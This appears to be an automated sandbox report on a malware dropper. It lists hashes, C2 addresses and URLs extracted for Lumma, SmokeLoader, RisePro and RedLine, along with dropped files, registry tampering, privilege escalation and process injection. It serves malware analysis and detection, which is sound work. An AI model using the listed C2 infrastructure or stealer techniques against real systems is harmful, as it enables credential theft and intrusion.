Resubmissions
submitted | analysis id | score
11-02-2024 08:10 | 240211-j212ragb47 | 10
11-02-2024 08:09 | 240211-j2kprseb2w | 10
09-02-2024 18:28 | 240209-w4c4xsde9t | 10
02-02-2024 12:52 | 240202-p4dxwsgfej | 10
02-02-2024 12:45 | 240202-pzapnsgdbp | 10
16-01-2024 15:29 | 240116-sw8dbaehh3 | 10
10-01-2024 14:41 | 240110-r2wq2ahchl | 10
10-01-2024 13:29 | 240110-qrqatshbg3 | 10
22-12-2023 08:48 | 231222-kqp1sadghq | 10
Analysis
max time kernel: 104s
max time network: 102s
platform: windows10-1703_x64
resource: win10-20231220-en
resource tags: arch:x64 arch:x86 image:win10-20231220-en locale:en-us os:windows10-1703-x64 system
submitted: 09-02-2024 18:28
Static task: static1
Behavioral task behavioral1: sample 4363463463464363463463463.exe, resource win7-20231215-en
Behavioral task behavioral2: sample 4363463463464363463463463.exe, resource win10-20231220-en
Behavioral task behavioral3: sample 4363463463464363463463463.exe, resource win10v2004-20231222-en
Behavioral task behavioral4: sample 4363463463464363463463463.exe, resource win11-20231222-en
Errors
General
Target: 4363463463464363463463463.exe
Size: 10KB
MD5: 2a94f3960c58c6e70826495f76d00b85
SHA1: e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256: 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512: fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP: 192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
lumma
185.99.133.246
Extracted
smokeloader
pub2
Extracted
smokeloader
2022
http://vatra.at/tmp/
http://spbdg.ru/tmp/
http://skinndia.com/tmp/
http://cracker.biz/tmp/
http://piratia-life.ru/tmp/
http://piratia.su/tmp/
Extracted
risepro
193.233.132.62
Extracted
redline
vic
91.92.241.115:12393
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Detect Lumma Stealer payload V2 1 IoCs
resource | yara_rule
behavioral2/files/0x000600000001abad-53.dat | family_lumma_V2
Detect Lumma Stealer payload V4 1 IoCs
resource | yara_rule
behavioral2/files/0x000600000001abad-53.dat | family_lumma_v4
Detect ZGRat V1 6 IoCs
resource | yara_rule
behavioral2/files/0x000700000001ab7a-132.dat | family_zgrat_v1
behavioral2/files/0x000700000001ab7a-133.dat | family_zgrat_v1
behavioral2/memory/3828-136-0x0000000000A40000-0x0000000000F44000-memory.dmp | family_zgrat_v1
behavioral2/files/0x000700000001ab8f-145.dat | family_zgrat_v1
behavioral2/files/0x000700000001ab8f-222.dat | family_zgrat_v1
behavioral2/files/0x000700000001ab8f-223.dat | family_zgrat_v1
Modifies security service 2 TTPs 5 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 2 IoCs
resource | yara_rule
behavioral2/memory/1056-386-0x0000000000400000-0x000000000043C000-memory.dmp | family_redline
behavioral2/memory/1056-468-0x0000000000400000-0x000000000043C000-memory.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 676 created 708 | 676 | WerFault.exe | 143
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description | pid | Process | procid_target
PID 2944 created 588 | 2944 | powershell.EXE | 3
PID 2772 created 588 | 2772 | powershell.EXE | 3
PID 1296 created 996 | 1296 | svchost.exe | 67
PID 1296 created 708 | 1296 | svchost.exe | 143
Downloads MZ/PE file
Stops running service(s) 3 TTPs
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\Control Panel\International\Geo\Nation | Setup.exe
Executes dropped EXE 15 IoCs
pid | Process
2660 | jopacrypt.exe
3552 | InstallSetup9.exe
2940 | BroomSetup.exe
4372 | nsd829F.tmp
1676 | crypted.exe
2804 | dmi1dfg7n.exe
2740 | 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
5080 | plaza.exe
3896 | v2.exe
2816 | Setup.exe
3828 | ma.exe
2000 | .exe
3544 | updater.exe
2192 | asdfg.exe
1200 | smss.exe
Loads dropped DLL 3 IoCs
pid | Process
3552 | InstallSetup9.exe
3552 | InstallSetup9.exe
3896 | v2.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Uses the VBS compiler for execution 1 TTPs
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Setup.exe
Key opened | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Setup.exe
Key opened | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Setup.exe
Key opened | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Setup.exe
Key opened | \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Setup.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow | ioc
13 | bitbucket.org
14 | bitbucket.org
32 | raw.githubusercontent.com
33 | raw.githubusercontent.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
41 | api.ipify.org
42 | api.ipify.org
Drops file in System32 directory 8 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | Process not Found
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | Process not Found
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | Process not Found
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid | Process
1676 | crypted.exe
5080 | plaza.exe
5080 | plaza.exe
5080 | plaza.exe
5080 | plaza.exe
5080 | Process not Found
5080 | Process not Found
Suspicious use of SetThreadContext 8 IoCs
description | pid | Process | procid_target
PID 2660 set thread context of 5028 | 2660 | jopacrypt.exe | 78
PID 2804 set thread context of 4308 | 2804 | dmi1dfg7n.exe | 125
PID 2944 set thread context of 928 | 2944 | powershell.EXE | 132
PID 3896 set thread context of 1056 | 3896 | v2.exe | 133
PID 2772 set thread context of 3092 | 2772 | powershell.EXE | 134
PID 2000 set thread context of 1664 | 2000 | .exe | 138
PID 3544 set thread context of 4052 | 3544 | Process not Found | 1793
PID 3544 set thread context of 4352 | 3544 | Process not Found | 1936
Drops file in Program Files directory 4 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | dmi1dfg7n.exe
File created | C:\Program Files\Google\Libs\WR64.sys | Process not Found
File created | C:\Program Files\Google\Libs\g.log | smss.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
Drops file in Windows directory 4 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\dialersvc32.job | dialer.exe
File opened for modification | C:\Windows\Tasks\dialersvc32.job | dialer.exe
File created | C:\Windows\Tasks\dialersvc64.job | dialer.exe
File opened for modification | C:\Windows\Tasks\dialersvc64.job | dialer.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
4552 | sc.exe
3696 | sc.exe
2848 | sc.exe
1060 | sc.exe
4224 | sc.exe
1720 | sc.exe
4152 | sc.exe
4812 | sc.exe
4876 | sc.exe
808 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | svchost.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4740 | schtasks.exe
1048 | schtasks.exe
Delays execution with timeout.exe 1 IoCs
pid | Process
3544 | timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid | Process
4220 | WMIC.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | Process not Found
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | Process not Found
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | Process not Found
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | Process not Found
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | Process not Found
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | Process not Found
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | Process not Found
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | 4363463463464363463463463.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [blob value omitted] | 4363463463464363463463463.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
2240 | PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2740 | 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
2740 | 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
2816 | Setup.exe
2816 | Setup.exe
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
4212 | powershell.exe
4212 | powershell.exe
3380 | Explorer.EXE
3380 | Explorer.EXE
4212 | powershell.exe
3380 | Explorer.EXE
3380 | Explorer.EXE
4212 | powershell.exe
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
3380 | Explorer.EXE
Suspicious behavior: LoadsDriver 64 IoCs
pid | Process
1224 | Process not Found
1060 | Process not Found
4104 | Process not Found
2184 | Process not Found
796 | Process not Found
3652 | Process not Found
808 | Process not Found
3132 | Process not Found
4880 | Process not Found
732 | Process not Found
1768 | Process not Found
4768 | Process not Found
4788 | Process not Found
5104 | Process not Found
1748 | Process not Found
3192 | Process not Found
3160 | Process not Found
3356 | Process not Found
4304 | Process not Found
3628 | Process not Found
4924 | Process not Found
3116 | Process not Found
1004 | Process not Found
664 | Process not Found
2944 | Process not Found
2320 | Process not Found
2312 | Process not Found
3136 | Process not Found
4828 | Process not Found
2852 | Process not Found
1692 | Process not Found
680 | Process not Found
4256 | Process not Found
4904 | Process not Found
704 | Process not Found
1324 | Process not Found
3492 | Process not Found
4544 | smss.exe
3704 | Process not Found
4564 | Process not Found
3692 | Process not Found
620 | Process not Found
4136 | Process not Found
2672 | Process not Found
1576 | Process not Found
4292 | Process not Found
2056 | Process not Found
3760 | smss.exe
2364 | Process not Found
3328 | Process not Found
320 | Process not Found
656 | Process not Found
608 | Process not Found
4876 | Process not Found
2888 | Process not Found
2148 | Process not Found
2816 | Process not Found
3236 | Process not Found
4972 | Process not Found
5036 | Process not Found
3256 | Process not Found
3296 | Process not Found
3516 | Process not Found
1048 | Process not Found
Suspicious behavior: MapViewOfSection 1 IoCs
pid | Process
2740 | 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4888 | 4363463463464363463463463.exe
Token: SeLoadDriverPrivilege | 1676 | crypted.exe
Token: SeDebugPrivilege | 3828 | ma.exe
Token: SeDebugPrivilege | 4212 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4212 | powershell.exe
Token: SeSecurityPrivilege | 4212 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4212 | powershell.exe
Token: SeLoadDriverPrivilege | 4212 | powershell.exe
Token: SeSystemProfilePrivilege | 4212 | powershell.exe
Token: SeSystemtimePrivilege | 4212 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4212 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4212 | powershell.exe
Token: SeCreatePagefilePrivilege | 4212 | powershell.exe
Token: SeBackupPrivilege | 4212 | powershell.exe
Token: SeRestorePrivilege | 4212 | powershell.exe
Token: SeShutdownPrivilege | 4212 | powershell.exe
Token: SeDebugPrivilege | 4212 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4212 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4212 | powershell.exe
Token: SeUndockPrivilege | 4212 | powershell.exe
Token: SeManageVolumePrivilege | 4212 | powershell.exe
Token: 33 | 4212 | powershell.exe
Token: 34 | 4212 | powershell.exe
Token: 35 | 4212 | powershell.exe
Token: 36 | 4212 | powershell.exe
Token: SeShutdownPrivilege | 1140 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1140 | powercfg.exe
Token: SeShutdownPrivilege | 1268 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1268 | powercfg.exe
Token: SeShutdownPrivilege | 1580 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1580 | powercfg.exe
Token: SeDebugPrivilege | 4172 | powershell.exe
Token: SeShutdownPrivilege | 1288 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1288 | powercfg.exe
Token: SeDebugPrivilege | 2000 | .exe
Token: SeIncreaseQuotaPrivilege | 4172 | powershell.exe
Token: SeSecurityPrivilege | 4172 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4172 | powershell.exe
Token: SeLoadDriverPrivilege | 4172 | powershell.exe
Token: SeSystemProfilePrivilege | 4172 | powershell.exe
Token: SeSystemtimePrivilege | 4172 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4172 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4172 | powershell.exe
Token: SeCreatePagefilePrivilege | 4172 | powershell.exe
Token: SeBackupPrivilege | 4172 | powershell.exe
Token: SeRestorePrivilege | 4172 | powershell.exe
Token: SeShutdownPrivilege | 4172 | powershell.exe
Token: SeDebugPrivilege | 4172 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4172 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4172 | powershell.exe
Token: SeUndockPrivilege | 4172 | powershell.exe
Token: SeManageVolumePrivilege | 4172 | powershell.exe
Token: 33 | 4172 | powershell.exe
Token: 34 | 4172 | powershell.exe
Token: 35 | 4172 | powershell.exe
Token: 36 | 4172 | powershell.exe
Token: SeShutdownPrivilege | 3380 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3380 | Explorer.EXE
Token: SeIncreaseQuotaPrivilege | 4172 | powershell.exe
Token: SeSecurityPrivilege | 4172 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4172 | powershell.exe
Token: SeLoadDriverPrivilege | 4172 | powershell.exe
Token: SeSystemProfilePrivilege | 4172 | powershell.exe
Token: SeSystemtimePrivilege | 4172 | powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs
pid | Process
1664 | vbc.exe
996 | dwm.exe
Suspicious use of SetWindowsHookEx 2 IoCs
pid | Process
2940 | BroomSetup.exe
5080 | plaza.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 4888 wrote to memory of 2660 | 4888 | 4363463463464363463463463.exe | 75
PID 4888 wrote to memory of 2660 | 4888 | 4363463463464363463463463.exe | 75
PID 4888 wrote to memory of 2660 | 4888 | 4363463463464363463463463.exe | 75
PID 4888 wrote to memory of 3552 | 4888 | 4363463463464363463463463.exe | 77
PID 4888 wrote to memory of 3552 | 4888 | 4363463463464363463463463.exe | 77
PID 4888 wrote to memory of 3552 | 4888 | 4363463463464363463463463.exe | 77
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 2660 wrote to memory of 5028 | 2660 | jopacrypt.exe | 78
PID 3552 wrote to memory of 2940 | 3552 | InstallSetup9.exe | 79
PID 3552 wrote to memory of 2940 | 3552 | InstallSetup9.exe | 79
PID 3552 wrote to memory of 2940 | 3552 | InstallSetup9.exe | 79
PID 3552 wrote to memory of 4372 | 3552 | InstallSetup9.exe | 80
PID 3552 wrote to memory of 4372 | 3552 | InstallSetup9.exe | 80
PID 3552 wrote to memory of 4372 | 3552 | InstallSetup9.exe | 80
PID 4888 wrote to memory of 1676 | 4888 | 4363463463464363463463463.exe | 81
